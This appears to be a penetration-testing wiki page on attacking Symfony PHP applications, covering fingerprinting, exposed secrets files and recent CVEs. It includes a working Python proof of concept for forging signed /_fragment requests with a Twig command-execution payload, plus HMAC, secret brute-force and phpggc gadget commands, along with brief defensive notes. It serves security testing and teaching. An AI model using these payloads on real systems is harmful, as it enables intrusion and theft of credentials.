# Symfony

{{#include ../../banners/hacktricks-training.md}}

Symfony is one of the most widely-used PHP frameworks and regularly appears in assessments of enterprise, e-commerce and CMS targets (Drupal, Shopware, Ibexa, OroCRM … all embed Symfony components).  This page collects offensive tips, common mis-configurations and recent vulnerabilities you should have on your checklist when you discover a Symfony application.

> Historical note: A large part of the ecosystem still runs the **5.4 LTS** branch (EOL **November 2025**).  Always verify the exact minor version because many 2023-2025 security advisories only fixed in patch releases (e.g. 5.4.46 → 5.4.50).

---

## Recon & Enumeration

### Finger-printing
* HTTP response headers: `X-Powered-By: Symfony`, `X-Debug-Token`, `X-Debug-Token-Link` or cookies starting with `sf_redirect`, `sf_session`, `MOCKSESSID`.
* Source code leaks (`composer.json`, `composer.lock`, `/vendor/…`) often reveal the exact version:
  ```bash
  curl -s https://target/vendor/composer/installed.json | jq '.[] | select(.name|test("symfony/")) | .name,.version'
  ```
* Public routes that only exist on Symfony:
  * `/_profiler`   (Symfony **Profiler** & debug toolbar)
  * `/_wdt/<token>` (“Web Debug Toolbar”)  
  * `/_error/{code}.{_format}` (pretty error pages)  
  * `/app_dev.php`, `/config.php`, `/config_dev.php` (pre-4.0 dev front-controllers)
* Wappalyzer, BuiltWith or ffuf/feroxbuster wordlists: `symfony.txt` → look for `/_fragment`, `/_profiler`, `.env`, `.htaccess`.

### Interesting files & endpoints
| Path | Why it matters |
|------|----------------|
| `/.env`, `/.env.local`, `/.env.prod` | Frequently mis-deployed → leaks `APP_SECRET`, DB creds, SMTP, AWS keys |
| `/.git`, `.svn`, `.hg` | Source disclosure → credentials + business logic |
| `/var/log/*.log`, `/log/dev.log` | Web-root mis-configuration exposes stack-traces |
| `/_profiler` | Full request history, configuration, service container, **APP_SECRET** (≤ 3.4) |
| `/_fragment` | Entry point used by ESI/HInclude.  Abuse possible once you know `APP_SECRET` |
| `/vendor/phpunit/phpunit/phpunit` | PHPUnit RCE if accessible (CVE-2017-9841) |
| `/index.php/_error/{code}` | Finger-print & sometimes leak exception traces |

---

## High-impact Vulnerabilities (2023-2025)

### 1. APP_SECRET disclosure ➜ RCE via `/_fragment` (aka “secret-fragment”)
* **CVE-2019-18889** originally, but *still* appears on modern targets when debug is left enabled or `.env` is exposed.
* Once you know the 32-char `APP_SECRET`, craft an HMAC token and abuse the internal `render()` controller to execute arbitrary Twig:
  ```python
  # PoC – requires the secret
  import hmac, hashlib, requests, urllib.parse as u
  secret = bytes.fromhex('deadbeef…')
  payload = "{{['id']|filter('system')}}"   # RCE in Twig
  query = {
      'template': '@app/404.html.twig',
      'filter': 'raw',
      '_format': 'html',
      '_locale': 'en',
      'globals[cmd]': 'id'
  }
  qs = u.urlencode(query, doseq=True)
  token = hmac.new(secret, qs.encode(), hashlib.sha256).hexdigest()
  r = requests.get(f"https://target/_fragment?{qs}&_token={token}")
  print(r.text)
  ```
* Excellent write-up & exploitation script: Ambionics blog (linked in References).

### 2. Windows Process Hijack – CVE-2024-51736
* The `Process` component searched the current working directory **before** `PATH` on Windows.  An attacker able to upload `tar.exe`, `cmd.exe`, etc. in a writable web-root and trigger `Process` (e.g. file extraction, PDF generation) gains command execution.
* Patched in 5.4.50, 6.4.14, 7.1.7.

### 3. Session-Fixation – CVE-2023-46733
* Authentication guard reused an existing session ID after login.  If an attacker sets the cookie **before** the victim authenticates, they hijack the account post-login.

### 4. Twig sandbox XSS – CVE-2023-46734
* In applications that expose user-controlled templates (admin CMS, email builder) the `nl2br` filter could be abused to bypass the sandbox and inject JS.

### 5. Symfony 1 gadget chains (still found in legacy apps)
* `phpggc symfony/1 system id` produces a Phar payload that triggers RCE when an unserialize() happens on classes such as `sfNamespacedParameterHolder`.  Check file-upload endpoints and `phar://` wrappers.

{{#ref}}
../../pentesting-web/deserialization/php-deserialization-+-autoload-classes.md
{{#endref}}

---

## Exploitation Cheat-Sheet

### Calculate HMAC token for `/_fragment`
```bash
python - <<'PY'
import sys, hmac, hashlib, urllib.parse as u
secret = bytes.fromhex(sys.argv[1])
qs     = u.quote_plus(sys.argv[2], safe='=&')
print(hmac.new(secret, qs.encode(), hashlib.sha256).hexdigest())
PY deadbeef… "template=@App/evil&filter=raw&_format=html"
```

### Bruteforce weak `APP_SECRET`
```bash
cewl -d3 https://target -w words.txt
symfony-secret-bruteforce.py -w words.txt -c abcdef1234567890 https://target
```

### RCE via exposed Symfony Console
If `bin/console` is reachable through `php-fpm` or direct CLI upload:
```bash
php bin/console about        # confirm it works
php bin/console cache:clear --no-warmup
```
Use deserialization gadgets inside the cache directory or write a malicious Twig template that will be executed on the next request.

---

## Defensive notes
1. **Never deploy debug** (`APP_ENV=dev`, `APP_DEBUG=1`) to production; block `/app_dev.php`, `/_profiler`, `/_wdt` in the web-server config.
2. Store secrets in env vars or `vault/secrets.local.php`, *never* in files accessible through the document-root.
3. Enforce patch management – subscribe to Symfony security advisories and keep at least the LTS patch-level.
4. If you run on Windows, upgrade immediately to mitigate CVE-2024-51736 or add a `open_basedir`/`disable_functions` defence-in-depth.

---

### Useful offensive tooling
* **ambionics/symfony-exploits** – secret-fragment RCE, debugger routes discovery.
* **phpggc** – Ready-made gadget chains for Symfony 1 & 2.
* **sf-encoder** – small helper to compute `_fragment` HMAC (Go implementation).



## References
* [Ambionics – Symfony “secret-fragment” Remote Code Execution](https://www.ambionics.io/blog/symfony-secret-fragment)
* [Symfony Security Advisory – CVE-2024-51736: Command Execution Hijack on Windows Process Component](https://symfony.com/blog/cve-2024-51736-command-execution-hijack-on-windows-with-process-class)
{{#include ../../banners/hacktricks-training.md}}